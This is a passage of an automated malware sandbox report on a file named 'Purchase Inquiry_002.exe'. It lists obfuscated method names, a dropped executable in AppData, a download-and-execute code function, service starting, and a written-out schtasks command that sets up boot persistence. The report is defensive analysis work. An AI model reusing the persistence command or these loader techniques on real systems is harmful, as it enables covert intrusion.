            Source: 0.2.Purchase Inquiry_002.exe.39b85e0.3.raw.unpack, D7aMauhAVxQYrmcyD0.csHigh entropy of concatenated method names: 's69fwNT3AD', 'bSXfW9UBry', 'pIWf0ijh5e', 'j4nfebD7F0', 'StuflnRFxY', 'mt60RljglO', 'D1g0ZNwMer', 'x3O0octTUv', 'xwv0mrWREF', 'OAL0Fqyxtl'
            Source: 0.2.Purchase Inquiry_002.exe.39b85e0.3.raw.unpack, q06fRr1ZQvBKjZ65oK.csHigh entropy of concatenated method names: 'J4sKQOIl62', 'aIeKIaKQOL', 'uc7K15vjlK', 'xUMKyqj2kD', 'O05KxJb5dy', 'uc1K6lWY3W', 'QW4KcGboxg', 'eYYK5ThnUg', 'OOjK9USPsd', 'STOKNx9OyD'
            Source: 0.2.Purchase Inquiry_002.exe.39b85e0.3.raw.unpack, T4r8SDCIv33WlslpT4.csHigh entropy of concatenated method names: 'ocVW1dFaPc', 'higWytRZIi', 'TQrWnSbhIC', 'KAaWpn9ZLG', 'LZLWRwRLhO', 'ly1WZoLlW6', 'm2iWoEmdPg', 'FmfWmF5a3k', 'bWTWFgfjtl', 'zEJWrgWUTp'
            Source: 0.2.Purchase Inquiry_002.exe.39b85e0.3.raw.unpack, voy5oLt5lQB891TIpt.csHigh entropy of concatenated method names: 'IkoYChHilV', 'B1TYsyrRk8', 'cSSYhQMx3d', 'kFPYxWGWFR', 'XrNYc8ROXt', 'ooVY51ADgL', 'uctYNYeS1Y', 'ss3YuBSGW1', 'E3aYQHDcL4', 'Of8YDvaFYv'
            Source: 0.2.Purchase Inquiry_002.exe.39b85e0.3.raw.unpack, cLlsgYs5GgOZjJJuSB.csHigh entropy of concatenated method names: 'SEcHEprBIm', 'vFuHgg3ZFW', 'AQUHCCOb7N', 'rvmHsSBsbE', 'xJIHKRmRUQ', 'STqHiaY15y', 'WvTHqQQZH3', 'WKaHVgiVI5', 'N9fH2WfIOd', 'lgiHXj4EgS'
            Source: 0.2.Purchase Inquiry_002.exe.39b85e0.3.raw.unpack, sq4j7xSMZiKRMXLZIsG.csHigh entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'OiMv29tXaO', 'P7WvXH6ruU', 'ydUvAfKjOa', 'KJsvvyx2gl', 'SNbvaSSmCM', 'CV9vkOfGbW', 'z8EvOwJ96J'
            Source: 0.2.Purchase Inquiry_002.exe.39b85e0.3.raw.unpack, geC6IOzmlqxGb0bPnU.csHigh entropy of concatenated method names: 'joFXgtVM1f', 'YgsXCCup30', 'xkaXskxKOK', 'frAXhKG9vx', 'h0vXxMOg0Z', 'vy1XcdSIeE', 'm6xX5pgE9X', 'xfmXOHHfUv', 'uvrX7V0cHE', 'ts5Xd6QyZ5'
            Source: 0.2.Purchase Inquiry_002.exe.39b85e0.3.raw.unpack, maZXEQ3nDp1ljW9RCv.csHigh entropy of concatenated method names: 'WZ904CbVya', 'zx508hIuOS', 'y91H66xFOJ', 'tZYHcW6TEy', 'WiwH5ueiVQ', 'jhWH9TY2TZ', 'pXdHN4Hplk', 'YM9HueLwsO', 'bIDHL46n8u', 'wIsHQ2lVh0'
            Source: 0.2.Purchase Inquiry_002.exe.39b85e0.3.raw.unpack, JWCbu2STQmAFYrqZv8L.csHigh entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'Sv5XD5E603', 'gY0XIB7kQ7', 'A0wXt0vc4s', 'M7lX1DcW04', 'xUFXyo1PxI', 'UHaXnS9iE2', 'GCeXp7M7Wg'
            Source: 0.2.Purchase Inquiry_002.exe.39b85e0.3.raw.unpack, QYTZ0oovg5cvcw2BTs.csHigh entropy of concatenated method names: 'UXs2KM2jco', 'EVL2q4o6Xq', 'Fmf22FGS89', 'k4f2ADpjHr', 'lIq2aoAJIx', 'unY2OtWk80', 'Dispose', 'Ur5VjauifP', 'Ae4VWBla1T', 'li3VHmFfck'
            Source: 0.2.Purchase Inquiry_002.exe.39b85e0.3.raw.unpack, hQHmh5SGuePN8j0Gbyu.csHigh entropy of concatenated method names: 'ToString', 'dqmACmHWL1', 'prsAsS4YGI', 'f8oA3bQ3ZA', 'T52AhW6PjM', 'E39Ax2qPDY', 'xClA64cxKb', 'ag0AcTfi5B', 'WQmwu7WfS8tc51jNQEo', 'aGivGAWO8QlJWtVySWZ'
            Source: 0.2.Purchase Inquiry_002.exe.39b85e0.3.raw.unpack, mRNTsXSSyB5C1XtedV6.csHigh entropy of concatenated method names: 'enFXrmbGgD', 'Ny9XzvgyX1', 'WhUATuBBSu', 'k8RASglAh7', 'UJtAG5soYc', 'grLAbAWoMg', 'J4rAMDXoOm', 'fFYAwHlsH0', 'MoCAjuB0SC', 'dTYAWGtM3u'
            Source: 0.2.Purchase Inquiry_002.exe.39b85e0.3.raw.unpack, rmh2ZarBytsKoPdbuC.csHigh entropy of concatenated method names: 'H4AXH8g7yW', 'q3BX06cgV5', 'qytXfo7ZQB', 'sC2Xerb7Da', 'VboX2Da0on', 'KZnXlBDAtv', 'Next', 'Next', 'Next', 'NextBytes'
            Source: 0.2.Purchase Inquiry_002.exe.39b85e0.3.raw.unpack, EvUA2UpoCgZNBBO9DW.csHigh entropy of concatenated method names: 'IVOqJ6Q61y', 'B7DqPmqbbs', 'ToString', 'wqnqjnY9Y9', 'orUqWXk7tC', 'EmlqH1WaAC', 'hBAq0XVXJa', 'Osfqfmb9sD', 'FcAqeKLg3E', 'qeoqlI5lsr'
            Source: 0.2.Purchase Inquiry_002.exe.39b85e0.3.raw.unpack, Dp9d0sMygJjXH0e0n6.csHigh entropy of concatenated method names: 'hDpSe4r8SD', 'Pv3Sl3Wlsl', 'o5GSJgOZjJ', 'muSSPBJaZX', 'f9RSKCvC7a', 'eauSiAVxQY', 'jTjQo4khR4aPaqNxXF', 'SEUZZlLZ9C9jUkAfmZ', 'uJOSSbksl8', 'rEaSbn3PIn'
            Source: 0.2.Purchase Inquiry_002.exe.39b85e0.3.raw.unpack, LmWRlEFadn72bQ25uI.csHigh entropy of concatenated method names: 'Tdb2hPs62w', 'swZ2xMwDbm', 'k1d26eqDgf', 'uFB2cb9w8C', 'CF6253dokS', 'zjN29i6ANb', 'CKV2NNJDym', 'xQW2uT0RWL', 'wX92Lw09t6', 'JaB2QvOvNn'
            Source: 0.2.Purchase Inquiry_002.exe.39b85e0.3.raw.unpack, MxJBTdnmkSbNwtYdT9.csHigh entropy of concatenated method names: 'ToString', 'R8YiD9L5L1', 'vJKixlI7iH', 'a4ni6JGgPG', 'WUDick8F3Y', 'SMRi5xM1N9', 'ELQi90a2j8', 'BXiiNuqFrB', 'LP2iu7y4vQ', 'mXCiLLGB78'
            Source: 0.2.Purchase Inquiry_002.exe.39b85e0.3.raw.unpack, oAHMyelsBlebo17c9D.csHigh entropy of concatenated method names: 'lG7bwMD3C1', 'CBjbjCENcR', 'OgBbWWLvRc', 'JMhbHn7Q6D', 'Cibb0ddesT', 'XObbfxrFSN', 'aibbenTsjF', 'pGgbljXhUJ', 'UVnbUhQ7rh', 'BZ4bJsjh1V'
            Source: 0.2.Purchase Inquiry_002.exe.39b85e0.3.raw.unpack, XVx5eEZqSV66eFTjYZ.csHigh entropy of concatenated method names: 'dhfqmjHUXb', 'UNgqrGWUkb', 'dfOVTWFHZI', 'BxlVSIuUPi', 'm8hqDkdfD2', 'W6mqIJTbJR', 'QxJqtGHmoA', 'P1Mq1OEmyJ', 'hEjqyGRcQE', 'rdEqnx644D'
            Source: 0.2.Purchase Inquiry_002.exe.39b85e0.3.raw.unpack, ixlCuvLaod7FlsCjho.csHigh entropy of concatenated method names: 'wG5e7JH6YK', 'oFyedO6XTj', 'hJreBv3P4J', 'wo6eEtWxpb', 'FVQe4eiIEU', 'cB7eg7agAt', 'Nyje8GorUV', 'sBEeCDBxcu', 'khCesgKNBS', 'qqVe3N3WFH'
            Source: 0.2.Purchase Inquiry_002.exe.39b85e0.3.raw.unpack, wpPir09WJs64xtIvcH.csHigh entropy of concatenated method names: 'J79fn8yfCF', 'MBWfpg66IG', 'zg9fRBuC7C', 'ToString', 'UllfZSFqnM', 'Fm2foih9eb', 'mNjqkGfglAvcstgrpZ2', 'rZAPqkf2oN9Ptr3R5Wb', 'fhGkd5flOqa7ltNg38x', 'aEE456fbE3XC8MZsNcx'
            Source: 0.2.Purchase Inquiry_002.exe.39b85e0.3.raw.unpack, GsiYJWW6oOdgKdhTNl.csHigh entropy of concatenated method names: 'Dispose', 'JcvSFcw2BT', 'AYpGx6xmDc', 'r3WdwykwiV', 'EhQSr92JaW', 'OTYSzPsVw3', 'ProcessDialogKey', 'FfNGTmWRlE', 'vdnGS72bQ2', 'JuIGG2mh2Z'
            Source: 0.2.Purchase Inquiry_002.exe.6f30000.5.raw.unpack, KrxB0FGnmZKpkyNbXX.csHigh entropy of concatenated method names: 'vsPBtrBGW', 'xJtEdwoJR', 'yQdgnS2yA', 'ocp8OY3DT', 'rW1sYqSkA', 'PaM3cQKJf', 'Opme0mhLgXvl11dZ7F', 'MwMQuhZrXX7jyjJlPl', 'vARVc4f2M', 'Gw2Xv2ygC'
            Source: 0.2.Purchase Inquiry_002.exe.6f30000.5.raw.unpack, D7aMauhAVxQYrmcyD0.csHigh entropy of concatenated method names: 's69fwNT3AD', 'bSXfW9UBry', 'pIWf0ijh5e', 'j4nfebD7F0', 'StuflnRFxY', 'mt60RljglO', 'D1g0ZNwMer', 'x3O0octTUv', 'xwv0mrWREF', 'OAL0Fqyxtl'
            Source: 0.2.Purchase Inquiry_002.exe.6f30000.5.raw.unpack, q06fRr1ZQvBKjZ65oK.csHigh entropy of concatenated method names: 'J4sKQOIl62', 'aIeKIaKQOL', 'uc7K15vjlK', 'xUMKyqj2kD', 'O05KxJb5dy', 'uc1K6lWY3W', 'QW4KcGboxg', 'eYYK5ThnUg', 'OOjK9USPsd', 'STOKNx9OyD'
            Source: 0.2.Purchase Inquiry_002.exe.6f30000.5.raw.unpack, T4r8SDCIv33WlslpT4.csHigh entropy of concatenated method names: 'ocVW1dFaPc', 'higWytRZIi', 'TQrWnSbhIC', 'KAaWpn9ZLG', 'LZLWRwRLhO', 'ly1WZoLlW6', 'm2iWoEmdPg', 'FmfWmF5a3k', 'bWTWFgfjtl', 'zEJWrgWUTp'
            Source: 0.2.Purchase Inquiry_002.exe.6f30000.5.raw.unpack, voy5oLt5lQB891TIpt.csHigh entropy of concatenated method names: 'IkoYChHilV', 'B1TYsyrRk8', 'cSSYhQMx3d', 'kFPYxWGWFR', 'XrNYc8ROXt', 'ooVY51ADgL', 'uctYNYeS1Y', 'ss3YuBSGW1', 'E3aYQHDcL4', 'Of8YDvaFYv'
            Source: 0.2.Purchase Inquiry_002.exe.6f30000.5.raw.unpack, cLlsgYs5GgOZjJJuSB.csHigh entropy of concatenated method names: 'SEcHEprBIm', 'vFuHgg3ZFW', 'AQUHCCOb7N', 'rvmHsSBsbE', 'xJIHKRmRUQ', 'STqHiaY15y', 'WvTHqQQZH3', 'WKaHVgiVI5', 'N9fH2WfIOd', 'lgiHXj4EgS'
            Source: 0.2.Purchase Inquiry_002.exe.6f30000.5.raw.unpack, sq4j7xSMZiKRMXLZIsG.csHigh entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'OiMv29tXaO', 'P7WvXH6ruU', 'ydUvAfKjOa', 'KJsvvyx2gl', 'SNbvaSSmCM', 'CV9vkOfGbW', 'z8EvOwJ96J'
            Source: 0.2.Purchase Inquiry_002.exe.6f30000.5.raw.unpack, geC6IOzmlqxGb0bPnU.csHigh entropy of concatenated method names: 'joFXgtVM1f', 'YgsXCCup30', 'xkaXskxKOK', 'frAXhKG9vx', 'h0vXxMOg0Z', 'vy1XcdSIeE', 'm6xX5pgE9X', 'xfmXOHHfUv', 'uvrX7V0cHE', 'ts5Xd6QyZ5'
            Source: 0.2.Purchase Inquiry_002.exe.6f30000.5.raw.unpack, maZXEQ3nDp1ljW9RCv.csHigh entropy of concatenated method names: 'WZ904CbVya', 'zx508hIuOS', 'y91H66xFOJ', 'tZYHcW6TEy', 'WiwH5ueiVQ', 'jhWH9TY2TZ', 'pXdHN4Hplk', 'YM9HueLwsO', 'bIDHL46n8u', 'wIsHQ2lVh0'
            Source: 0.2.Purchase Inquiry_002.exe.6f30000.5.raw.unpack, JWCbu2STQmAFYrqZv8L.csHigh entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'Sv5XD5E603', 'gY0XIB7kQ7', 'A0wXt0vc4s', 'M7lX1DcW04', 'xUFXyo1PxI', 'UHaXnS9iE2', 'GCeXp7M7Wg'
            Source: 0.2.Purchase Inquiry_002.exe.6f30000.5.raw.unpack, QYTZ0oovg5cvcw2BTs.csHigh entropy of concatenated method names: 'UXs2KM2jco', 'EVL2q4o6Xq', 'Fmf22FGS89', 'k4f2ADpjHr', 'lIq2aoAJIx', 'unY2OtWk80', 'Dispose', 'Ur5VjauifP', 'Ae4VWBla1T', 'li3VHmFfck'
            Source: 0.2.Purchase Inquiry_002.exe.6f30000.5.raw.unpack, hQHmh5SGuePN8j0Gbyu.csHigh entropy of concatenated method names: 'ToString', 'dqmACmHWL1', 'prsAsS4YGI', 'f8oA3bQ3ZA', 'T52AhW6PjM', 'E39Ax2qPDY', 'xClA64cxKb', 'ag0AcTfi5B', 'WQmwu7WfS8tc51jNQEo', 'aGivGAWO8QlJWtVySWZ'
            Source: 0.2.Purchase Inquiry_002.exe.6f30000.5.raw.unpack, mRNTsXSSyB5C1XtedV6.csHigh entropy of concatenated method names: 'enFXrmbGgD', 'Ny9XzvgyX1', 'WhUATuBBSu', 'k8RASglAh7', 'UJtAG5soYc', 'grLAbAWoMg', 'J4rAMDXoOm', 'fFYAwHlsH0', 'MoCAjuB0SC', 'dTYAWGtM3u'
            Source: 0.2.Purchase Inquiry_002.exe.6f30000.5.raw.unpack, rmh2ZarBytsKoPdbuC.csHigh entropy of concatenated method names: 'H4AXH8g7yW', 'q3BX06cgV5', 'qytXfo7ZQB', 'sC2Xerb7Da', 'VboX2Da0on', 'KZnXlBDAtv', 'Next', 'Next', 'Next', 'NextBytes'
            Source: 0.2.Purchase Inquiry_002.exe.6f30000.5.raw.unpack, EvUA2UpoCgZNBBO9DW.csHigh entropy of concatenated method names: 'IVOqJ6Q61y', 'B7DqPmqbbs', 'ToString', 'wqnqjnY9Y9', 'orUqWXk7tC', 'EmlqH1WaAC', 'hBAq0XVXJa', 'Osfqfmb9sD', 'FcAqeKLg3E', 'qeoqlI5lsr'
            Source: 0.2.Purchase Inquiry_002.exe.6f30000.5.raw.unpack, Dp9d0sMygJjXH0e0n6.csHigh entropy of concatenated method names: 'hDpSe4r8SD', 'Pv3Sl3Wlsl', 'o5GSJgOZjJ', 'muSSPBJaZX', 'f9RSKCvC7a', 'eauSiAVxQY', 'jTjQo4khR4aPaqNxXF', 'SEUZZlLZ9C9jUkAfmZ', 'uJOSSbksl8', 'rEaSbn3PIn'
            Source: 0.2.Purchase Inquiry_002.exe.6f30000.5.raw.unpack, LmWRlEFadn72bQ25uI.csHigh entropy of concatenated method names: 'Tdb2hPs62w', 'swZ2xMwDbm', 'k1d26eqDgf', 'uFB2cb9w8C', 'CF6253dokS', 'zjN29i6ANb', 'CKV2NNJDym', 'xQW2uT0RWL', 'wX92Lw09t6', 'JaB2QvOvNn'
            Source: 0.2.Purchase Inquiry_002.exe.6f30000.5.raw.unpack, MxJBTdnmkSbNwtYdT9.csHigh entropy of concatenated method names: 'ToString', 'R8YiD9L5L1', 'vJKixlI7iH', 'a4ni6JGgPG', 'WUDick8F3Y', 'SMRi5xM1N9', 'ELQi90a2j8', 'BXiiNuqFrB', 'LP2iu7y4vQ', 'mXCiLLGB78'
            Source: 0.2.Purchase Inquiry_002.exe.6f30000.5.raw.unpack, oAHMyelsBlebo17c9D.csHigh entropy of concatenated method names: 'lG7bwMD3C1', 'CBjbjCENcR', 'OgBbWWLvRc', 'JMhbHn7Q6D', 'Cibb0ddesT', 'XObbfxrFSN', 'aibbenTsjF', 'pGgbljXhUJ', 'UVnbUhQ7rh', 'BZ4bJsjh1V'
            Source: 0.2.Purchase Inquiry_002.exe.6f30000.5.raw.unpack, XVx5eEZqSV66eFTjYZ.csHigh entropy of concatenated method names: 'dhfqmjHUXb', 'UNgqrGWUkb', 'dfOVTWFHZI', 'BxlVSIuUPi', 'm8hqDkdfD2', 'W6mqIJTbJR', 'QxJqtGHmoA', 'P1Mq1OEmyJ', 'hEjqyGRcQE', 'rdEqnx644D'
            Source: 0.2.Purchase Inquiry_002.exe.6f30000.5.raw.unpack, ixlCuvLaod7FlsCjho.csHigh entropy of concatenated method names: 'wG5e7JH6YK', 'oFyedO6XTj', 'hJreBv3P4J', 'wo6eEtWxpb', 'FVQe4eiIEU', 'cB7eg7agAt', 'Nyje8GorUV', 'sBEeCDBxcu', 'khCesgKNBS', 'qqVe3N3WFH'
            Source: 0.2.Purchase Inquiry_002.exe.6f30000.5.raw.unpack, wpPir09WJs64xtIvcH.csHigh entropy of concatenated method names: 'J79fn8yfCF', 'MBWfpg66IG', 'zg9fRBuC7C', 'ToString', 'UllfZSFqnM', 'Fm2foih9eb', 'mNjqkGfglAvcstgrpZ2', 'rZAPqkf2oN9Ptr3R5Wb', 'fhGkd5flOqa7ltNg38x', 'aEE456fbE3XC8MZsNcx'
            Source: 0.2.Purchase Inquiry_002.exe.6f30000.5.raw.unpack, GsiYJWW6oOdgKdhTNl.csHigh entropy of concatenated method names: 'Dispose', 'JcvSFcw2BT', 'AYpGx6xmDc', 'r3WdwykwiV', 'EhQSr92JaW', 'OTYSzPsVw3', 'ProcessDialogKey', 'FfNGTmWRlE', 'vdnGS72bQ2', 'JuIGG2mh2Z'
            Source: C:\Users\user\AppData\Roaming\xASiLfzXONGIW.exeCode function: 14_2_004063C6 ShellExecuteW,URLDownloadToFileW,14_2_004063C6
            Source: C:\Users\user\Desktop\Purchase Inquiry_002.exeFile created: C:\Users\user\AppData\Roaming\xASiLfzXONGIW.exeJump to dropped file

            Boot Survival

            barindex
            Uses schtasks.exe or at.exe to add and modify task schedules
            Source: C:\Users\user\Desktop\Purchase Inquiry_002.exeProcess created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\xASiLfzXONGIW" /XML "C:\Users\user\AppData\Local\Temp\tmp3EA3.tmp"
            Source: C:\Users\user\AppData\Roaming\xASiLfzXONGIW.exeCode function: 14_2_00418A00 OpenSCManagerW,OpenServiceW,CloseServiceHandle,StartServiceW,CloseServiceHandle,CloseServiceHandle,CloseServiceHandle,14_2_00418A00

            Hooking and other Techniques for Hiding and Protection

            barindex
            Loading BitLocker PowerShell Module
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
            Source: C:\Users\user\AppData\Roaming\xASiLfzXONGIW.exeCode function: 14_2_0041A8DA LoadLibraryA,LoadLibraryA,GetProcAddress,GetProcAddress,GetModuleHandleA,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,14_2_0041A8DA
            Source: C:\Users\user\Desktop\Purchase Inquiry_002.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Purchase Inquiry_002.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Purchase Inquiry_002.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Purchase Inquiry_002.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Purchase Inquiry_002.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Purchase Inquiry_002.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Purchase Inquiry_002.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Purchase Inquiry_002.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Purchase Inquiry_002.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Purchase Inquiry_002.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Purchase Inquiry_002.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Purchase Inquiry_002.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Purchase Inquiry_002.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Purchase Inquiry_002.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Purchase Inquiry_002.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Purchase Inquiry_002.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Purchase Inquiry_002.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Purchase Inquiry_002.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Purchase Inquiry_002.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Purchase Inquiry_002.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Purchase Inquiry_002.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Purchase Inquiry_002.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Purchase Inquiry_002.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Purchase Inquiry_002.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Purchase Inquiry_002.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Purchase Inquiry_002.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Purchase Inquiry_002.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Purchase Inquiry_002.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Purchase Inquiry_002.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Purchase Inquiry_002.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Purchase Inquiry_002.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Purchase Inquiry_002.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Purchase Inquiry_002.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Purchase Inquiry_002.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Purchase Inquiry_002.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Purchase Inquiry_002.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Purchase Inquiry_002.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Purchase Inquiry_002.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Purchase Inquiry_002.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Purchase Inquiry_002.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Purchase Inquiry_002.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Purchase Inquiry_002.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Purchase Inquiry_002.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Purchase Inquiry_002.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Purchase Inquiry_002.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
